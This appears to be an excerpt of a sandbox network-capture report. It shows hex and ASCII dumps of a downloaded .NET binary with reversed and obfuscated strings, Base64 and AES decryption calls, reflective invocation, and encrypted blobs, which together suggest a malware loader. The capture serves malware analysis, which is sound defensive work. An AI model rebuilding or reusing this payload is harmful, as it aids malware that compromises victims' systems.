                                                                                                                                                                                                          Data Ascii: eGetProcAddressprocNamekernel32rehctaMxiferPirUsuomynonApttHslennahCledoMecivreSmetsyS24071tSi6jr5Is5ZeBtWmSQVarglaitnederCtneilCnekoTdeussIytiruceSledoMecivreSmetsyS25110redniBrenetsiLnoisseSylpeRredniBrenetsiLrehctapsiDledoMecivreSmetsyS49324tx
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC114INData Raw: 69 6c 65 4d 6f 64 65 00 46 69 6c 65 41 63 63 65 73 73 00 46 69 6c 65 53 68 61 72 65 00 6c 6b 70 36 39 71 5a 47 63 00 4e 69 58 54 41 32 48 58 37 00 54 6f 41 72 72 61 79 00 73 31 46 65 43 49 54 44 67 00 73 65 74 5f 4b 65 79 00 73 65 74 5f 49 56 00 43 72 65 61 74 65 44 65 63 72 79 70 74 6f 72 00 57 72 69 74 65 00 7a 6c 58 58 6f 63 43 6c 69 00 67 65 74 5f 4f 66 66 73 65 74 54 6f 53 74 72 69 6e 67 44 61 74 61 00 77 4e 31 63 64 52 79 54 53 00 53 74 61 72 74 73 57 69 74 68 00 67 65 74 5f 43 68 61 72 73 00 4d 71 55 4b 55 67 6a 62 45 00 72 74 36 73 58 58 68 65 31 00 61 44 4b 71 78 59 71 5a 6f 00 4b 34 79 78 4c 4a 72 74 4b 00 75 76 4b 79 64 42 6a 76 34 00 75 33 54 47 46 51 42 65 78 00 6d 66 76 42 64 70 68 58 79 00 76 53 33 4c 6a 38 58 78 45 00 43 49 4b 46 42 59 35
                                                                                                                                                                                                          Data Ascii: ileModeFileAccessFileSharelkp69qZGcNiXTA2HX7ToArrays1FeCITDgset_Keyset_IVCreateDecryptorWritezlXXocCliget_OffsetToStringDatawN1cdRyTSStartsWithget_CharsMqUKUgjbErt6sXXhe1aDKqxYqZoK4yxLJrtKuvKydBjv4u3TGFQBexmfvBdphXyvS3Lj8XxECIKFBY5
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC118INData Raw: 6f 67 36 61 70 36 46 52 6c 55 36 00 54 30 67 45 54 75 45 65 54 55 4f 5a 34 55 36 53 39 33 75 00 7a 77 32 4f 37 73 45 6b 65 33 67 57 55 70 41 41 44 6e 4b 00 4e 30 35 68 76 51 48 74 4f 58 00 6c 50 6e 68 52 55 6b 74 32 54 00 63 44 30 68 4e 35 32 6e 4c 48 00 73 4a 33 68 72 50 57 78 58 37 00 56 61 76 68 62 34 30 41 73 37 00 52 65 6b 68 50 33 41 70 6d 30 00 61 59 73 68 36 35 62 44 69 63 00 52 37 6c 68 54 5a 31 42 70 5a 00 42 46 6d 32 56 59 45 4b 78 6c 51 4e 4f 32 39 52 33 54 69 00 47 52 49 38 42 4b 6a 4c 70 56 00 66 6e 38 38 43 6f 6f 75 67 67 00 75 67 53 38 78 79 43 67 67 66 00 69 48 49 38 44 37 49 47 79 50 00 50 66 4a 38 31 76 44 38 44 79 00 65 4e 64 38 67 6b 55 67 4b 47 00 43 41 6d 38 61 48 4c 32 56 46 00 66 77 72 68 44 73 74 51 6a 6e 00 4c 42 36 38 6c 66 51
                                                                                                                                                                                                          Data Ascii: og6ap6FRlU6T0gETuEeTUOZ4U6S93uzw2O7sEke3gWUpAADnKN05hvQHtOXlPnhRUkt2TcD0hN52nLHsJ3hrPWxX7Vavhb40As7RekhP3Apm0aYsh65bDicR7lhTZ1BpZBFm2VYEKxlQNO29R3TiGRI8BKjLpVfn88CoouggugS8xyCggfiHI8D7IGyPPfJ81vD8DyeNd8gkUgKGCAm8aHL2VFfwrhDstQjnLB68lfQ
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC122INData Raw: 72 67 65 74 49 6e 76 6f 63 61 74 69 6f 6e 45 78 63 65 70 74 69 6f 6e 00 4b 69 34 69 42 36 36 4c 48 56 00 70 6f 77 69 4c 34 38 54 73 73 00 58 74 61 69 46 6c 38 61 64 6f 00 4f 4b 47 69 57 6b 70 66 76 42 00 4c 61 6f 69 6e 57 4a 51 53 45 00 43 6f 6e 73 74 72 75 63 74 6f 72 49 6e 66 6f 00 73 65 74 5f 49 74 65 6d 00 4f 76 65 72 66 6c 6f 77 45 78 63 65 70 74 69 6f 6e 00 54 72 79 47 65 74 56 61 6c 75 65 00 4e 75 6c 6c 52 65 66 65 72 65 6e 63 65 45 78 63 65 70 74 69 6f 6e 00 41 72 69 74 68 6d 65 74 69 63 45 78 63 65 70 74 69 6f 6e 00 64 62 4d 69 4a 72 69 77 34 70 00 68 50 55 41 68 6b 41 43 49 6d 00 74 69 4b 41 69 58 6b 78 59 79 00 50 4e 71 6c 6a 57 48 5a 49 56 00 45 6d 70 74 79 54 79 70 65 73 00 53 69 7a 65 6f 66 00 58 6b 57 6c 6b 43 31 35 33 42 00 4a 67 35 6c 74
                                                                                                                                                                                                          Data Ascii: rgetInvocationExceptionKi4iB66LHVpowiL48TssXtaiFl8adoOKGiWkpfvBLaoinWJQSEConstructorInfoset_ItemOverflowExceptionTryGetValueNullReferenceExceptionArithmeticExceptiondbMiJriw4phPUAhkACImtiKAiXkxYyPNqljWHZIVEmptyTypesSizeofXkWlkC153BJg5lt
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC126INData Raw: 64 30 39 62 36 36 33 62 65 32 38 39 37 36 63 31 66 31 33 00 6d 5f 37 36 39 36 34 37 36 34 62 63 37 66 34 63 64 63 62 35 34 63 39 66 62 31 65 32 39 31 64 66 66 31 00 6d 5f 33 38 35 62 30 36 30 32 36 38 34 33 34 35 63 30 62 63 62 36 32 63 32 65 62 63 35 61 66 34 66 64 00 6d 5f 34 39 38 63 37 32 65 39 62 37 64 61 34 34 32 38 39 37 65 35 31 37 36 63 64 38 36 35 36 32 63 38 00 6d 5f 30 65 34 36 62 36 36 66 39 36 65 61 34 38 39 61 38 61 64 33 38 32 30 30 61 66 66 64 39 61 64 63 00 6d 5f 31 63 34 64 38 37 36 35 66 37 38 36 34 37 32 39 38 64 65 34 66 64 30 66 62 33 35 62 38 61 65 32 00 6d 5f 63 63 36 30 34 39 30 38 30 63 34 32 34 36 38 61 61 61 39 31 62 61 37 32 34 37 37 66 65 33 30 34 00 6d 5f 37 32 66 65 62 64 30 34 35 66 34 66 34 34 37 30 61 36 65 32 64 31 63
                                                                                                                                                                                                          Data Ascii: d09b663be28976c1f13m_76964764bc7f4cdcb54c9fb1e291dff1m_385b0602684345c0bcb62c2ebc5af4fdm_498c72e9b7da442897e5176cd86562c8m_0e46b66f96ea489a8ad38200affd9adcm_1c4d8765f78647298de4fd0fb35b8ae2m_cc6049080c42468aaa91ba72477fe304m_72febd045f4f4470a6e2d1c
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC129INData Raw: 61 79 36 63 57 54 00 58 36 4d 6e 7a 48 73 35 48 46 00 62 70 31 35 6e 4a 43 47 6d 5a 00 78 6e 6d 35 45 62 6f 64 33 6d 00 78 67 6a 35 78 57 6b 6a 37 63 00 47 45 4b 35 4a 77 56 76 35 51 00 4b 35 4e 35 79 72 34 51 71 45 00 51 50 32 35 55 76 75 33 4b 44 00 41 6d 63 35 6b 6b 50 79 4a 5a 00 50 50 72 35 71 69 39 46 76 53 00 42 69 6e 64 65 72 00 54 6f 43 68 61 72 41 72 72 61 79 00 46 72 6f 6d 42 61 73 65 36 34 43 68 61 72 41 72 72 61 79 00 54 6f 43 68 61 72 00 41 70 70 65 6e 64 00 49 6e 76 6f 6b 65 4d 65 6d 62 65 72 00 47 65 74 4d 65 6d 62 65 72 00 6f 70 5f 45 78 70 6c 69 63 69 74 00 53 69 7a 65 4f 66 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 00 67 65 74 5f 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 00 54 68
                                                                                                                                                                                                          Data Ascii: ay6cWTX6MnzHs5HFbp15nJCGmZxnm5Ebod3mxgj5xWkj7cGEK5JwVv5QK5N5yr4QqEQP25Uvu3KDAmc5kkPyJZPPr5qi9FvSBinderToCharArrayFromBase64CharArrayToCharAppendInvokeMemberGetMemberop_ExplicitSizeOfApplicationSystem.Windows.Formsget_ExecutablePathTh
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC133INData Raw: 69 00 67 00 6f 00 4c 00 6c 00 71 00 53 00 74 00 6e 00 65 00 69 00 6c 00 43 00 6c 00 71 00 53 00 61 00 74 00 61 00 44 00 6d 00 65 00 74 00 73 00 79 00 53 00 38 00 35 00 35 00 36 00 00 0f 52 00 65 00 70 00 6c 00 61 00 63 00 65 00 00 27 46 00 72 00 6f 00 6d 00 42 00 61 00 73 00 65 00 36 00 34 00 43 00 68 00 61 00 72 00 41 00 72 00 72 00 61 00 79 00 00 17 54 00 6f 00 43 00 68 00 61 00 72 00 41 00 72 00 72 00 61 00 79 00 00 0d 4c 00 65 00 6e 00 67 00 74 00 68 00 00 07 47 00 65 00 74 00 00 59 4c 00 4b 00 4c 00 30 00 4a 00 67 00 6b 00 58 00 32 00 32 00 6f 00 4f 00 76 00 43 00 4a 00 70 00 44 00 58 00 68 00 7a 00 6a 00 78 00 6f 00 34 00 7a 00 37 00 75 00 42 00 48 00 77 00 45 00 44 00 41 00 4e 00 76 00 56 00 4c 00 6a 00 4e 00 50 00 41 00 65 00 49 00 3d 00 00 31 65
                                                                                                                                                                                                          Data Ascii: igoLlqStneilClqSataDmetsyS8556Replace'FromBase64CharArrayToCharArrayLengthGetYLKL0JgkX22oOvCJpDXhzjxo4z7uBHwEDANvVLjNPAeI=1e
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC137INData Raw: 05 0a 0f 05 08 1d 05 18 08 08 1d 05 08 08 05 20 01 01 0f 01 09 20 02 12 80 c1 0e 11 81 2d 07 20 04 01 08 08 08 08 04 00 01 1c 1c 03 07 01 1c 04 00 01 02 0e 05 20 00 12 81 65 05 20 02 0e 0e 0e 06 20 01 12 81 69 0e 06 00 03 18 18 0e 09 05 00 02 0e 0e 0e 07 00 04 18 18 09 09 09 0a 00 05 08 18 18 1d 05 09 10 18 06 00 03 0e 0e 0e 0e 08 00 04 08 18 08 08 10 08 06 00 03 18 09 08 09 04 00 01 08 18 03 00 00 18 05 00 02 02 18 18 0a 07 05 1d 05 12 81 6d 08 08 08 0d 20 04 01 0e 11 81 71 11 81 75 11 81 79 05 00 00 12 80 ad 07 00 01 1d 05 12 80 ad 08 07 02 12 80 ad 12 80 f9 05 20 00 12 80 a1 07 20 03 01 1d 05 08 08 04 00 01 08 0e 0b 07 06 0f 03 45 0e 08 08 08 0f 03 05 00 02 02 0e 0e 06 07 04 02 02 08 08 04 20 01 02 0e 04 20 01 03 08 07 07 04 1d 05 08 08 08 06 07 03 1d
                                                                                                                                                                                                          Data Ascii: - e im quy E
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC142INData Raw: 04 06 12 82 58 06 20 02 01 1c 10 02 09 00 03 01 1c 10 02 12 82 58 04 06 12 82 5c 07 00 02 01 1c 12 82 5c 04 06 12 82 60 06 20 01 12 80 ad 1c 09 00 02 12 80 ad 1c 12 82 60 04 06 12 82 64 05 20 02 01 1c 0a 08 00 03 01 1c 0a 12 82 64 04 06 12 82 68 07 20 01 1d 12 81 1d 1c 0a 00 02 1d 12 81 1d 1c 12 82 68 04 06 12 82 6c 06 20 01 12 80 95 1c 09 00 02 12 80 95 1c 12 82 6c 04 06 12 82 70 07 00 02 02 1c 12 82 70 04 06 12 82 74 09 20 02 02 12 80 95 12 80 95 0c 00 03 02 12 80 95 12 80 95 12 82 74 04 06 12 82 78 04 20 01 05 1c 07 00 02 05 1c 12 82 78 04 06 12 82 7c 04 20 01 0a 1c 07 00 02 0a 1c 12 82 7c 04 06 12 82 80 04 20 01 0c 1c 07 00 02 0c 1c 12 82 80 04 06 12 82 84 04 20 01 0d 1c 07 00 02 0d 1c 12 82 84 04 06 12 82 88 07 20 02 12 80 ad 1c 0e 0a 00 03 12 80 ad
                                                                                                                                                                                                          Data Ascii: X X\\` `d dh hl lppt tx x| |
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC146INData Raw: d7 7b 95 c7 19 9b f4 c0 cd b7 51 f5 d4 9f 1c e6 c9 f3 16 31 99 fe 93 cf 1c 6a 38 dd 25 b3 35 3c f0 61 be da 09 5d a1 c0 98 41 d9 a7 34 33 19 df d7 27 f0 df 69 b7 7b a1 45 28 0f c9 ca bc 6b 41 8d 56 40 92 67 e5 06 fa 37 10 ea ef 44 01 2d 76 d2 f8 c5 71 a6 18 d0 27 c8 ae 57 44 95 97 90 cd f3 33 fd 37 85 f7 2c 9a dd 71 a3 ed e2 5a 15 58 2e cd 11 04 be 97 2b 4f 48 40 e1 88 a5 c4 a1 66 1f 10 b6 ae 0f 06 8d 30 52 23 ad b1 32 ab 54 f0 7e fe 58 07 63 0c 13 bd 1e b1 b5 79 13 c0 34 ac e8 cf 23 5a 42 84 14 b7 1f 5e 6d 8b a2 bf de 72 2b d7 03 ca 4b 4d 98 df 39 13 08 2a 7f 77 c8 47 28 7b d5 47 14 31 20 e8 06 f5 bd 2e 16 56 4d 21 21 d6 3c 72 56 36 b0 0b 50 2c 0f 18 38 e0 3a 46 ea 81 dc 20 62 87 0b c2 83 8f 34 63 08 8b c7 69 53 9d 36 1e 95 48 14 4c da 12 03 1a c1 9d af
                                                                                                                                                                                                          Data Ascii: {Q1j8%5<a]A43'i{E(kAV@g7D-vq'WD37,qZX.+OH@f0R#2T~Xcy4#ZB^mr+KM9*wG({G1 .VM!!<rV6P,8:F b4ciS6HL
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC150INData Raw: 60 3c 78 e7 eb 3a 6f 2d fb 84 45 e5 41 a9 a4 48 85 4f 2e 6e db 02 fc 3a 0b 40 b2 ef fd e1 5d b0 fa 99 2b 83 6d 5c 9c 18 8c a2 ac 7d 53 d7 3a 03 b6 2a 4c 2f c7 45 26 69 d7 be ab 01 cc ca 84 c4 34 8e 2b c3 ee 36 0a 9e 27 f5 52 7e 11 f9 62 27 2e 95 7c 79 d4 1d 86 95 7e 41 cd 4b 29 e7 9e 8d 99 86 67 73 19 f5 e3 fc 65 bf 28 dd 21 a3 a3 1c a2 db 67 6e 53 9a 7f 49 c7 51 94 af 17 4a 75 49 d2 a2 1f cf e6 84 f9 12 eb c1 02 1e ed 65 6f e0 78 93 79 70 3a fc 17 e2 31 3e fc 18 53 3f 4b c3 e3 95 fc f0 e9 a0 13 99 a3 d3 37 02 3f ac 0a 00 42 15 5e c0 54 85 bc 2a 9a 01 53 6b 49 88 86 1f 99 04 2b 4a f5 4f c6 02 d4 5f b5 d0 7d 34 ec 7c 07 ad cf a0 88 36 55 bc a0 59 8a 19 dc ab db b8 9b 6f cf 6d fd da 99 e2 73 d5 bf 47 7c 2e bc 27 a2 13 bd 92 14 e8 59 b1 85 7f c6 eb 57 54 35
                                                                                                                                                                                                          Data Ascii: `<x:o-EAHO.n:@]+m\}S:*L/E&i4+6'R~b'.|y~AK)gse(!gnSIQJuIeoxyp:1>S?K7?B^T*SkI+JO_}4|6UYomsG|.'YWT5
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC154INData Raw: 34 52 aa c5 e3 ff 54 a7 4c 92 3c 8d c2 08 bc b2 6f ef 5a 75 19 44 50 7b 04 aa b6 75 b0 0d c5 51 fc 81 0f d1 92 18 60 2f 69 99 25 ec a2 ba 2e e3 e7 6e 47 d9 69 e5 86 5b c9 7d 56 84 9b 71 03 24 9a 21 d5 4d 06 dd c8 a6 48 61 c2 5a 1d aa b1 72 f1 4e a2 ed 93 e4 83 19 07 11 3a 20 5c 0f 4c 07 06 9b 3b 6d 5e 4d 1d 95 f1 7a b5 d1 9d 1a a2 c2 30 61 eb 29 41 ca 55 b5 5d 7b 33 9c 61 78 3d 78 c6 39 1d 4b 49 43 1a fe b5 17 4a b4 ac c3 01 fa 40 8d 5a ef 6d b6 41 ba 54 cd 8e 9c 1b 17 75 13 c4 a4 ad 65 13 13 d9 1d 92 31 47 91 db 5e 85 a8 17 40 aa 34 61 0d b9 e6 ff 54 93 8b 5e 78 75 17 7b ca fd 21 f5 62 65 87 8e 75 59 35 2f de c3 e8 9c 38 3c e7 f6 e8 17 e5 8d e4 38 ce c3 db 88 e4 66 6e eb 77 04 9a 3e 48 1c 64 2b b4 ba 7d 23 52 fb dd bc e4 92 be 51 fd b5 1a b6 5e e3 7b a1
                                                                                                                                                                                                          Data Ascii: 4RTL<oZuDP{uQ`/i%.nGi[}Vq$!MHaZrN: \L;m^Mz0a)AU]{3ax=x9KICJ@ZmATue1G^@4aT^xu{!beuY5/8<8fnw>Hd+}#RQ^{
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC158INData Raw: c4 0f 4c 9e 63 67 fd d1 90 e9 74 dd 0d ad 1b ed e9 e1 b1 34 33 0b c0 ee eb 64 9c 76 73 47 6b 01 f1 a1 92 bb 8e 6e a7 04 0f 43 98 ed 75 05 82 38 40 b8 7b 5e db 79 b2 9a 65 0d 09 70 4e f4 cd 3d ac 03 09 94 65 f8 96 f2 13 bb 88 59 07 a7 04 e2 81 40 8d e6 d2 77 95 32 ef 0c 50 df 49 40 0f 95 ec 0b b8 9c 30 ba 60 fe c7 ee fc 78 55 7e 49 d1 e3 88 78 71 4f ae 3c 68 4b 0f 81 55 b0 eb 7a ae ee 3d ea 66 dd bb 08 20 0e 28 39 84 3f 39 91 59 26 81 51 11 67 d5 09 c0 87 0b 28 a8 d9 65 81 db 34 d1 d2 67 5f 75 1c a5 cc 56 11 7b 85 36 63 a6 20 d5 e0 14 0d 05 ff 6b fe 6f 11 9c 71 22 e3 fb c0 77 a8 d1 a9 0b fb a4 0d 8d e2 96 4b 8f d4 6c 6d ca 76 da cf fe f1 55 6d 70 82 0e 67 d8 c3 10 aa 7e c3 a7 56 d3 2e f7 e6 9f 6d d8 5e ca 73 aa 77 4b 7b 14 51 a0 1c 77 bc 43 ea 07 41 a7 8c
                                                                                                                                                                                                          Data Ascii: Lcgt43dvsGknCu8@{^yepN=eY@w2PI@0`xU~IxqO<hKUz=f (9?9Y&Qg(e4g_uV{6c koq"wKlmvUmpg~V.m^swK{QwCA
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC161INData Raw: 41 d9 0b 2c 2b bf b7 00 de a8 14 9d 4a f9 da 87 6c 93 c5 de af 44 29 17 31 60 09 6f 5c 5f fc e0 29 9a 0c 53 c1 a2 6c 71 24 a9 0c cf f6 7a c2 8d 76 14 9a f8 4e 51 f6 68 ba e6 d7 2b e5 22 a4 02 8a a1 48 b0 ad 77 77 b8 ad cb 35 61 86 c4 8f c2 17 ce 93 6a a4 9e eb 13 7e 75 3c a7 62 bd 10 5f 3e fc 53 16 44 24 d3 fd 49 57 03 ae cb 89 c3 0a 32 b8 21 4c 3c b6 07 bd b6 95 6a 24 b2 bb 52 ba 4e 4f 35 bb 9f ed 2f 0a 12 73 eb 93 3c 8f 11 ab 79 9d 20 aa 0e 63 4c 4b 8d b9 b9 3c 1a e1 1e 4f a7 62 45 54 b6 04 bd d9 79 bd 47 9b 9d f8 6e 3b c4 f4 22 2e 78 f7 40 1e 38 ee df dc 1f 08 6a 9f 1b e5 5d 7f 7a 1f 15 80 cd cc 4b d8 fa 97 b1 44 fc f5 77 06 09 70 4a 6e a0 71 b0 7b 3b 89 52 f5 4f 8b d4 c5 4b ee e8 e2 5f 35 06 2f bf 00 31 68 42 f6 73 b5 7e 9c 48 1c 87 2c d3 68 85 47 40
                                                                                                                                                                                                          Data Ascii: A,+JlD)1`o\_)Slq$zvNQh+"Hww5aj~u<b_>SD$IW2!L<j$RNO5/s<y cLK<ObETyGn;".x@8j]zKDwpJnq{;ROK_5/1hBs~H,hG@
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC165INData Raw: 07 48 9a 2d 6b 27 90 23 ad 8f c6 4a 70 f4 62 31 16 86 69 29 db d0 5f 81 a6 d1 ef 01 f2 2d 4c 9f 3d f5 0f ff 36 35 48 0e 13 07 be 5b 9e 8c fa d8 bd 13 05 dc 77 c3 db eb 93 ed 03 ec 7c b7 0a 59 6e 26 47 e1 08 e3 a1 eb a2 11 5c 09 06 fc 20 52 56 4a 4a 12 8e 10 ae 53 fc cb 81 1a 6b 50 3f 66 b5 28 77 b8 51 b3 66 1f f2 ac 97 53 5f 2f 45 6f 1e eb 5b f6 c9 5b 51 6c 55 28 f3 64 22 35 7e 24 68 19 fb de 5c eb 4d 1f 0b 9f db 1b aa ba 41 45 0c fd 73 f3 19 13 d8 be ef 16 d1 ca 8f 47 e7 59 d8 4c fe 16 03 c3 a5 3e 17 aa 4c b5 2a 03 1a ab a8 f9 3f 12 44 44 ea d3 19 08 fb f2 fe 02 62 90 53 63 25 03 7f ec bd 58 c3 36 41 26 75 99 af 06 51 98 09 78 ba 6e c0 5e 1a eb 2e 46 4d aa 60 f0 82 58 08 cd a9 f4 80 d4 f8 3d 5e 75 09 5c c6 a7 13 80 16 ab 93 43 9b 9e 8a dc ba 6d 3b 37 3c
                                                                                                                                                                                                          Data Ascii: H-k'#Jpb1i)_-L=65H[w|Yn&G\ RVJJSkP?f(wQfS_/Eo[[QlU(d"5~$h\MAEsGYL>L*?DDbSc%X6A&uQxn^.FM`X=^u\Cm;7<
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC169INData Raw: 93 b3 02 aa 98 05 69 85 e7 b4 ad bd 62 04 f9 f5 8c 9b d0 ca f4 03 06 8c d1 8c 79 99 89 60 94 b7 01 03 4a eb c1 0a f0 36 67 ae c6 57 d6 a5 f9 37 34 fa fd 0e 6a 4d ab 03 b4 2e eb 12 88 f2 2f e3 8a 51 d7 41 cc 3f b3 58 ff f9 ef 67 e5 b9 ce 5f 9c 14 f6 c2 58 6a 78 fc cb 45 e6 65 f1 4b 5e d1 65 f9 91 ab 6c 3d fb 24 38 05 4a 24 60 ef ed 8f f6 25 02 f2 4d b2 0a 40 21 c4 76 48 9f 68 3c 0d 30 12 32 a3 c4 d8 9f 03 45 f2 82 a0 4b 0e 9e 07 64 23 dd ec 6f 35 9d ca 93 e3 b3 68 6a e7 d3 61 53 9b 42 8a b0 58 96 0b 7d 9e 05 3c fe 2d de af 91 fd d1 1f 9d e8 ff f9 74 dd 50 6e 0d d8 3d f3 87 6e 84 ea ef 33 7b 80 4d 4d e4 f5 37 d3 fd 50 44 3e c1 20 5d 71 e2 f3 a0 3b a8 a3 3c b5 69 d8 7d d6 18 75 b9 1f 39 90 95 00 d2 a7 b5 0f cc 87 71 22 6a c0 60 f6 de a5 fd ac ae d9 c0 8a e7
                                                                                                                                                                                                          Data Ascii: iby`J6gW74jM./QA?Xg_XjxEeK^el=$8J$`%M@!vHh<02EKd#o5hjaSBX}<-tPn=n3{MM7PD> ]q;<i}u9q"j`
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC174INData Raw: 0f 33 a2 94 fb 08 14 2c a2 d3 66 8e 81 48 77 2f 61 b0 19 1b 04 9b 9e 76 08 e1 4b 55 75 5d b5 87 d2 e1 24 ec 3a ea 5a a4 03 96 d1 0c be 36 ac 2d 12 de 8f dd 23 da 7e f0 f8 aa 5a 3b c4 3d ae cc cf 05 97 ac a9 c5 82 f2 43 d1 4e a9 b5 eb 26 6e d8 5c e6 af 0b cf 6f 7d a0 b4 1c 64 c5 f8 66 96 f6 85 91 f7 e1 63 03 f8 85 d5 d3 44 13 6c d9 46 05 7c 7f 35 83 b1 4c 83 9b 12 5c e8 3e d0 6e 97 9b 7c 23 29 87 b5 50 77 cf 27 04 96 5f 93 b1 47 c2 a3 87 fb fd 78 48 39 5f 0a 79 1d 36 85 91 fc d0 f7 14 0f 15 eb fc 12 c1 7c 74 96 1f e3 f2 38 76 74 18 13 6f e4 dd 75 51 86 53 67 40 9c b0 8f f0 5b b6 03 cc af 7e 19 08 97 be bc c9 f7 ad 82 91 3b 56 2f f2 01 9d f0 f2 a7 88 ab 19 75 78 4f 01 ed ce 04 90 f0 3e 37 e4 f2 b2 2c 60 af 17 57 9f d1 74 de a1 ec 96 1a 74 b7 52 e2 ee be e9
                                                                                                                                                                                                          Data Ascii: 3,fHw/avKUu]$:Z6-#~Z;=CN&n\o}dfcDlF|5L\>n|#)Pw'_GxH9_y6|t8vtouQSg@[~;V/uxO>7,`WttR
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC178INData Raw: bb 87 5e e3 57 46 e1 c3 6a 8c 87 d0 9a 7f df 5d 7a 4c 62 01 ae 55 90 3c 0c 46 21 4e bc b3 65 7b 44 78 3d 60 7c fc db a5 84 e5 d3 5e f0 71 fe a9 3d fc d9 6c 95 bf 72 ef ad 0f bb c7 b6 ca c7 20 f9 2a 9f e4 d8 8a 24 50 ed 96 c2 e0 dd 0d 22 8f a0 63 18 b8 78 68 e0 d4 7c 77 29 2b 76 d0 84 6e 51 04 d2 90 7e 33 e6 8b 18 33 00 a8 db ef 56 0c 6b 40 bb 61 61 b3 6d 40 4f 86 61 7b 6b b7 cb 61 df 55 46 05 65 ed cb e0 f1 47 f6 be 72 fe 90 11 a9 5a 7c f8 cf bf 2a ab ba 5c c4 c2 20 c7 2c b7 a0 50 cc c1 44 a2 b3 98 b8 96 c1 c5 d4 61 a2 43 c2 5d 54 99 37 8f a0 3f 6f 5f b2 92 62 a0 f2 15 eb e2 80 00 05 93 43 40 64 22 d5 ff 93 b7 5b d0 27 04 f1 6c 67 48 4c c8 a3 ae 6e d5 bb e7 b6 3e c4 40 8e 59 48 c0 1e 0d 7e 7c 63 7e 99 c0 f1 af f1 61 73 bd 0b 9a 17 68 a9 b3 18 dd e6 66 3d
                                                                                                                                                                                                          Data Ascii: ^WFj]zLbU<F!Ne{Dx=`|^q=lr *$P"cxh|w)+vnQ~33Vk@aam@Oa{kaUFeGrZ|*\ ,PDaC]T7?o_bC@d"['lgHLn>@YH~|c~ashf=
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC182INData Raw: a1 40 3d d0 41 5f 78 6e 26 0f 1d be 27 54 62 f7 79 3a 87 24 3b 3b 6d 23 05 b1 3d f3 92 ff fe e2 f1 8a 73 5b 95 1a 9b df c9 4f 19 de 6f 88 43 f1 ff 41 f7 b7 8e 02 8b ef 2b 14 5a 6b 22 e4 85 5a 14 a1 33 a9 6e 83 4f 62 e4 4e a8 90 03 f2 9c b1 66 94 ea 3e 78 eb a4 5e d7 07 3c 7f a7 58 3c 68 16 32 b8 7e 17 45 42 bc 54 b3 86 db e2 12 95 86 e5 96 e3 58 67 95 c8 bf d9 87 1f 37 43 4d 25 84 a1 26 9f c3 03 ea 07 37 e7 f9 d0 38 4b 92 bf 90 e1 83 44 3a ce 8d e4 bc 1a 60 63 ad 96 b5 8d 46 be 44 c0 9d 6c cd 20 ef f3 58 42 ed e7 90 5a a0 50 14 c2 a2 4f bc c8 c2 ee 1c 9f 8d 74 da f9 dd 02 a2 18 ec eb 81 51 28 0c 39 71 fe 9a 9f 8c fe e6 98 9e 7b 56 e2 a7 dd de 72 ad f2 ac 0d d9 1d e9 7c 8d c2 da 59 f6 fc 6b 67 a7 91 a5 04 35 cf 81 f0 ab 78 4e f1 22 f1 ec ef d9 6b 81 48 94
                                                                                                                                                                                                          Data Ascii: @=A_xn&'Tby:$;;m#=s[OoCA+Zk"Z3nObNf>x^<X<h2~EBTXg7CM%&78KD:`cFDl XBZPOtQ(9q{Vr|Ykg5xN"kH
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC186INData Raw: a4 a9 a9 f5 9f 97 dc 96 f1 9a eb 67 14 13 f0 35 65 13 4b 9e d2 40 a7 24 cf 2a ee 82 9a 3c 87 d2 33 45 9d db 5e 84 c6 e0 ab a9 f0 8e b9 24 5e 51 65 93 d9 4d 7f a6 36 d6 8f 73 f2 2c aa 18 be ab 51 0d 61 a3 76 88 b4 1d 76 29 a8 a5 4c 69 18 78 4e 0e f4 f5 65 3a 44 20 fc ee ae fe 17 67 19 98 bd 2e 29 8e 5b 98 26 3c 3e db ea 3a 17 61 3c 0e 9f 73 14 93 e4 32 a6 91 ef ff 7b 1d a6 93 5d 51 81 32 ae 39 84 ee f4 24 7c 55 21 69 97 c7 35 af bf 21 da f8 f4 74 06 d1 ca 41 82 aa 06 c5 a1 58 45 ba 46 5a 06 e1 47 a9 b4 b2 52 4a 6b 3c 86 09 6e 02 fc 79 e2 74 fb 63 6a 7f 22 68 27 97 c9 10 0e f2 94 c9 2c a1 d7 7a 74 0e 1b cf ec f4 c4 b1 38 ba b9 e2 6b de ab a5 3a 0c 71 57 e2 f4 02 28 5e 00 74 90 e6 24 19 22 fa 1c 6e b9 7a 97 fa 22 d4 c5 7c 93 53 c6 b3 d0 61 f0 b0 a6 b0 07 82
                                                                                                                                                                                                          Data Ascii: g5eK@$*<3E^$^QeM6s,Qavv)LixNe:D g.)[&<>:a<s2{]Q29$|U!i5!tAXEFZGRJk<nytcj"h',zt8k:qW(^t$"nz"|Sa
